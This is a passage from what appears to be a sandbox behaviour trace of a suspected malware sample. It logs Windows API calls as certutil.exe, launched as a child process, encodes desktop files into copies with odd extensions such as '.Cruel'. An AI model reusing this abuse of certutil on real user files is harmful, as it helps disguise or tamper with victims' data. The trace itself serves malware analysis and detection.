_ArgList=0x2d7d3f618 | out: _Buffer="Input Length = 76134") returned 20 [0240.291] GetFileType (hFile=0x50) returned 0x2 [0240.291] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x2d7d3e5c0*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x2d7d3e574, lpReserved=0x0 | out: lpBuffer=0x2d7d3e5c0*, lpNumberOfCharsWritten=0x2d7d3e574*=0x14) returned 1 [0240.425] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0240.425] _vsnwprintf (in: _Buffer=0x2d7d3e5c0, _BufferCount=0x1ff, _Format="\n", _ArgList=0x2d7d3f618 | out: _Buffer="\n") returned 1 [0240.426] GetFileType (hFile=0x50) returned 0x2 [0240.426] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x2d7d3e5c0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x2d7d3e574, lpReserved=0x0 | out: lpBuffer=0x2d7d3e5c0*, lpNumberOfCharsWritten=0x2d7d3e574*=0x1) returned 1 [0240.583] GetFileAttributesExW (in: lpFileName="NbugXFY9poFh8.gif.Cruel" (normalized: "c:\\users\\fd1hvy\\desktop\\nbugxfy9pofh8.gif.cruel"), fInfoLevelId=0x0, lpFileInformation=0x2d7d3f5d0 | out: lpFileInformation=0x2d7d3f5d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9f60e80, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xb9f60e80, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xb9fc9e5f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x19926)) returned 1 [0240.583] _vsnwprintf (in: _Buffer=0x2d7d3f5d8, _BufferCount=0xb, _Format="%d", _ArgList=0x2d7d3f5c8 | out: _Buffer="361") returned 3 [0240.583] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0x2d7d3f390, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0240.583] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x1381e150250 [0240.583] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0240.583] _vsnwprintf (in: _Buffer=0x2d7d3e5c0, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0x2d7d3f618 | out: _Buffer="Output Length = 104742") returned 22 [0240.583] GetFileType (hFile=0x50) returned 0x2 [0240.583] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x2d7d3e5c0*, nNumberOfCharsToWrite=0x16, lpNumberOfCharsWritten=0x2d7d3e574, lpReserved=0x0 | out: lpBuffer=0x2d7d3e5c0*, lpNumberOfCharsWritten=0x2d7d3e574*=0x16) returned 1 [0240.720] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0240.720] _vsnwprintf (in: _Buffer=0x2d7d3e5c0, _BufferCount=0x1ff, _Format="\n", _ArgList=0x2d7d3f618 | out: _Buffer="\n") returned 1 [0240.720] GetFileType (hFile=0x50) returned 0x2 [0240.720] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x2d7d3e5c0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x2d7d3e574, lpReserved=0x0 | out: lpBuffer=0x2d7d3e5c0*, lpNumberOfCharsWritten=0x2d7d3e574*=0x1) returned 1 [0240.816] LocalFree (hMem=0x1381e1506b0) returned 0x0 [0240.816] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0240.816] _vsnwprintf (in: _Buffer=0x2d7d3f638, _BufferCount=0xb, _Format="%d", _ArgList=0x2d7d3f628 | out: _Buffer="2022") returned 4 [0240.816] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0x2d7d3f3f0, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0240.816] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x1381e128e40 [0240.816] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0240.816] _vsnwprintf (in: _Buffer=0x2d7d3e620, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0x2d7d3f678 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0240.816] GetFileType (hFile=0x50) returned 0x2 [0240.816] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x2d7d3e620*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0x2d7d3e5d4, lpReserved=0x0 | out: lpBuffer=0x2d7d3e620*, lpNumberOfCharsWritten=0x2d7d3e5d4*=0x31) returned 1 [0240.869] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0240.869] _vsnwprintf (in: _Buffer=0x2d7d3e620, _BufferCount=0x1ff, _Format="\n", _ArgList=0x2d7d3f678 | out: _Buffer="\n") returned 1 [0240.869] GetFileType (hFile=0x50) returned 0x2 [0240.870] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x2d7d3e620*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x2d7d3e5d4, lpReserved=0x0 | out: lpBuffer=0x2d7d3e620*, lpNumberOfCharsWritten=0x2d7d3e5d4*=0x1) returned 1 [0240.902] LocalFree (hMem=0x0) returned 0x0 [0240.902] LocalFree (hMem=0x1381e130400) returned 0x0 [0240.902] LocalFree (hMem=0x1381e133110) returned 0x0 [0240.902] SetLastError (dwErrCode=0x80070716) [0240.902] _vsnwprintf (in: _Buffer=0x2d7d3f6a8, _BufferCount=0xb, _Format="%d", _ArgList=0x2d7d3f698 | out: _Buffer="511") returned 3 [0240.902] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0x2d7d3f460, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0240.903] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x1381e14ff80 [0240.903] PostQuitMessage (nExitCode=0) [0240.903] GetMessageW (in: lpMsg=0x2d7d3fca0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2d7d3fca0) returned 0 [0240.903] LocalFree (hMem=0x1381e13b6d0) returned 0x0 [0240.903] LocalFree (hMem=0x1381e150220) returned 0x0 [0240.903] LocalFree (hMem=0x0) returned 0x0 [0240.903] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0240.904] GetLastError () returned 0x7e [0240.904] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0240.904] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0240.904] DllMain () returned 0x1 [0240.904] LocalFree (hMem=0x1381e13b7f0) returned 0x0 [0240.904] LocalFree (hMem=0x1381e131fd0) returned 0x0 [0240.904] LocalFree (hMem=0x1381e150280) returned 0x0 [0240.904] LocalFree (hMem=0x1381e150250) returned 0x0 [0240.904] LocalFree (hMem=0x1381e128e40) returned 0x0 [0240.904] LocalFree (hMem=0x1381e14ff80) returned 0x0 [0240.904] LocalFree (hMem=0x1381e1347c0) returned 0x0 [0240.904] LocalFree (hMem=0x1381e1325a0) returned 0x0 [0240.905] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0240.905] GetLastError () returned 0x7e [0240.905] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0240.905] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0240.905] DllMain () returned 0x1 [0240.905] exit (_Code=0) Thread: id = 69 os_tid = 0x1340 Process: id = "24" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x1d606000" os_pid = "0x1208" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"NMgihtIW4j90xeC_.mkv.Sister\" \"NMgihtIW4j90xeC_.mkv.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 70 os_tid = 0x1020 [0241.292] GetStartupInfoW (in: lpStartupInfo=0xe0a2acfc60 | out: lpStartupInfo=0xe0a2acfc60*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"NMgihtIW4j90xeC_.mkv.Sister\" \"NMgihtIW4j90xeC_.mkv.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0241.293] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0241.293] __set_app_type (_Type=0x1) [0241.294] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0241.294] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0241.296] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0241.296] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0241.297] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0241.297] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0241.297] WerSetFlags () returned 0x0 [0241.297] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0241.297] __iob_func () returned 0x7ffcea2dea00 [0241.298] _fileno (_File=0x7ffcea2dea30) returned 1 [0241.298] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0241.298] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0241.299] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0241.299] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0241.299] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0241.300] GetConsoleOutputCP () returned 0x1b5 [0241.300] _vsnwprintf (in: _Buffer=0xe0a2acfbd0, _BufferCount=0xb, _Format=".%d", _ArgList=0xe0a2acfaf8 | out: _Buffer=".437") returned 4 [0241.300] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0241.300] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0241.300] GetFileType (hFile=0x50) returned 0x2 [0241.301] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0241.301] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0241.301] SetThreadUILanguage (LangId=0x0) returned 0x409 [0241.301] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0241.302] GetCommandLineW () returned="certutil -encode \"NMgihtIW4j90xeC_.mkv.Sister\" \"NMgihtIW4j90xeC_.mkv.Cruel\"" [0241.302] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x24297cdb3f0 [0241.302] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x24297ccc8c0 [0241.302] LocalFree (hMem=0x24297cdb3f0) returned 0x0 [0241.302] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x24297ccbd00 [0241.302] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x24297ccbeb0 [0241.302] LocalFree (hMem=0x24297ccbd00) returned 0x0 [0241.302] LocalFree (hMem=0x24297ccc8c0) returned 0x0 [0241.302] LocalFree (hMem=0x0) returned 0x0 [0241.302] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0241.302] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0241.303] GetCommandLineW () returned="certutil -encode \"NMgihtIW4j90xeC_.mkv.Sister\" \"NMgihtIW4j90xeC_.mkv.Cruel\"" [0241.303] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x24297cdb6d0 [0241.303] GetSystemTime (in: lpSystemTime=0xe0a2acf8c0 | out: lpSystemTime=0xe0a2acf8c0*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x31, wSecond=0xf, wMilliseconds=0x34c)) [0241.303] SystemTimeToFileTime (in: lpSystemTime=0xe0a2acf8c0, lpFileTime=0xe0a2acf8b8 | out: lpFileTime=0xe0a2acf8b8) returned 1 [0241.303] FileTimeToLocalFileTime (in: lpFileTime=0xe0a2acf8b8, lpLocalFileTime=0xe0a2acf880 | out: lpLocalFileTime=0xe0a2acf880) returned 1 [0241.303] FileTimeToSystemTime (in: lpFileTime=0xe0a2acf880, lpSystemTime=0xe0a2acf5f0 | out: lpSystemTime=0xe0a2acf5f0) returned 1 [0241.303] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0xe0a2acf5f0, lpFormat=0x0, lpDateStr=0xe0a2acf700, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0241.303] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0xe0a2acf5f0, lpFormat=0x0, lpTimeStr=0xe0a2acf600, cchTime=128 | out: lpTimeStr="8:49 PM") returned 8 [0241.303] _vsnwprintf (in: _Buffer=0xe0a2acf60e, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0xe0a2acf5d8 | out: _Buffer=" 15.844s") returned 8 [0241.304] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x24297cddd70 [0241.304] SetLastError (dwErrCode=0x80070716) [0241.304] _vsnwprintf (in: _Buffer=0xe0a2acf688, _BufferCount=0xb, _Format="%d", _ArgList=0xe0a2acf678 | out: _Buffer="948") returned 3 [0241.304] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0xe0a2acf440, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0241.304] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x24297cdba90 [0241.304] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x24297ce4c70 [0241.304] LocalFree (hMem=0x24297cddd70) returned 0x0 [0241.305] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xe0a2acf930 | out: lpSystemTimeAsFileTime=0xe0a2acf930*(dwLowDateTime=0xba6ff8b0, dwHighDateTime=0x1d6141f)) [0241.305] GetLocalTime (in: lpSystemTime=0xe0a2acf968 | out: lpSystemTime=0xe0a2acf968*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x31, wSecond=0xf, wMilliseconds=0x34d)) [0241.305] SystemTimeToFileTime (in: lpSystemTime=0xe0a2acf968, lpFileTime=0xe0a2acf940 | out: lpFileTime=0xe0a2acf940) returned 1 [0241.305] CompareFileTime (lpFileTime1=0xe0a2acf940, lpFileTime2=0xe0a2acf930) returned 1 [0241.305] _vsnwprintf (in: _Buffer=0xe0a2acf978, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0xe0a2acf908 | out: _Buffer="GMT + 2.00") returned 10 [0241.305] LocalFree (hMem=0x24297cdb6d0) returned 0x0 [0241.305] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde520000 [0241.305] FindResourceW (hModule=0x7ffcde520000, lpName=0x1, lpType=0x10) returned 0x7ffcde5e0090 [0241.305] LoadResource (hModule=0x7ffcde520000, hResInfo=0x7ffcde5e0090) returned 0x7ffcde5e00b0 [0241.305] LockResource (hResData=0x7ffcde5e00b0) returned 0x7ffcde5e00b0 [0241.305] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0241.305] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0xe0a2acf9a8 | out: _Buffer="10.0.15063.447") returned 14 [0241.306] GetACP () returned 0x4e4 [0241.306] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0241.306] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x24297cdb8f0 [0241.306] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x24297cdb8f0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0241.306] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x24297cddcb0 [0241.306] _vsnwprintf (in: _Buffer=0x24297cddcb0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xe0a2acf9f8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0241.306] LocalFree (hMem=0x24297cdb8f0) returned 0x0 [0241.306] LocalFree (hMem=0x0) returned 0x0 [0241.306] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0241.306] GetACP () returned 0x4e4 [0241.306] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0241.306] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x24297cdb7d0 [0241.306] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x24297cdb7d0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0241.306] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x24297cddd30 [0241.306] _vsnwprintf (in: _Buffer=0x24297cddd30, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xe0a2acf9f8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0241.306] LocalFree (hMem=0x24297cdb7d0) returned 0x0 [0241.306] LocalFree (hMem=0x0) returned 0x0 [0241.306] GetACP () returned 0x4e4 [0241.306] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0241.306] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x24297cdb390 [0241.306] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x24297cdb390, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0241.307] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x24297cddeb0 [0241.307] _vsnwprintf (in: _Buffer=0x24297cddeb0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xe0a2acfa28 | out: _Buffer="10.0.15063.447 retail") returned 21 [0241.307] LocalFree (hMem=0x24297cdb390) returned 0x0 [0241.307] LocalFree (hMem=0x24297cddcb0) returned 0x0 [0241.307] LocalFree (hMem=0x24297cddd30) returned 0x0 [0241.307] LocalFree (hMem=0x24297cddeb0) returned 0x0 [0241.307] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0241.307] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0241.307] GetStockObject (i=0) returned 0x900010 [0241.307] RegisterClassW (lpWndClass=0xe0a2acfb50) returned 0xc1a2 [0241.307] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x2102be [0241.324] NtdllDefWindowProc_W () returned 0x0 [0241.324] NtdllDefWindowProc_W () returned 0x1 [0241.331] NtdllDefWindowProc_W () returned 0x0 [0241.393] UpdateWindow (hWnd=0x2102be) returned 1 [0241.393] PostMessageW (hWnd=0x2102be, Msg=0x400, wParam=0x0, lParam=0x24297cc217e) returned 1 [0241.393] GetMessageW (in: lpMsg=0xe0a2acfba0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xe0a2acfba0) returned 1 [0241.393] TranslateMessage (lpMsg=0xe0a2acfba0) returned 0 [0241.393] DispatchMessageW (lpMsg=0xe0a2acfba0) returned 0x0 [0241.393] NtdllDefWindowProc_W () returned 0x0 [0241.393] GetMessageW (in: lpMsg=0xe0a2acfba0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xe0a2acfba0) returned 1 [0241.393] TranslateMessage (lpMsg=0xe0a2acfba0) returned 0 [0241.393] DispatchMessageW (lpMsg=0xe0a2acfba0) returned 0x0 [0241.393] LocalAlloc (uFlags=0x0, uBytes=0x86) returned 0x24297cd0810 [0241.393] LocalAlloc (uFlags=0x0, uBytes=0x92) returned 0x24297cc4430 [0241.394] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0241.394] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0241.394] SetLastError (dwErrCode=0x80070716) [0241.394] _vsnwprintf (in: _Buffer=0xe0a2acf5a8, _BufferCount=0xb, _Format="%d", _ArgList=0xe0a2acf598 | out: _Buffer="465") returned 3 [0241.394] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0xe0a2acf360, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0241.394] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x24297ccc060 [0241.394] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0241.394] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0241.394] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0xe0a2acf340, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0241.394] GetLastError () returned 0xcb [0241.395] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0241.395] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0241.395] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0241.395] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0241.395] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0241.395] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0241.395] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0241.395] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0241.395] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0241.395] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0241.395] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0241.395] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0241.395] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0241.395] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0241.395] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0241.395] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0241.395] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0241.395] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0241.395] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0241.395] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0241.395] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0241.396] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0xe0a2acf008 | out: phkResult=0xe0a2acf008*=0x23c) returned 0x0 [0241.396] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x24297cc95b0 [0241.396] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0xe0a2acf578, lpData=0xe0a2acf5a8, lpcbData=0xe0a2acf570*=0x4 | out: lpType=0xe0a2acf578*=0x0, lpData=0xe0a2acf5a8*=0x0, lpcbData=0xe0a2acf570*=0x4) returned 0x2 [0241.396] LocalFree (hMem=0x24297cc95b0) returned 0x0 [0241.396] RegCloseKey (hKey=0x23c) returned 0x0 [0241.396] LocalFree (hMem=0x0) returned 0x0 [0241.396] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x24297cee570 [0241.411] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0241.412] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0241.412] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0241.412] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0241.412] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0241.412] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0241.412] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0241.412] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0241.412] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0241.412] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0241.412] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0241.413] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0241.413] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0241.413] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0241.413] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0241.413] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0241.413] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x24297cf21d0 [0241.413] GetComputerNameW (in: lpBuffer=0x24297cf21d0, nSize=0xe0a2acf570 | out: lpBuffer="NQDPDE", nSize=0xe0a2acf570) returned 1 [0241.413] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0xe0a2acf540 | out: lpBuffer=0x0, nSize=0xe0a2acf540) returned 0 [0241.414] GetLastError () returned 0xea [0241.414] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x24297cdb670 [0241.414] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x24297cdb670, nSize=0xe0a2acf540 | out: lpBuffer="NQdPdE", nSize=0xe0a2acf540) returned 1 [0241.414] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0241.417] CertCreateCertificateContext 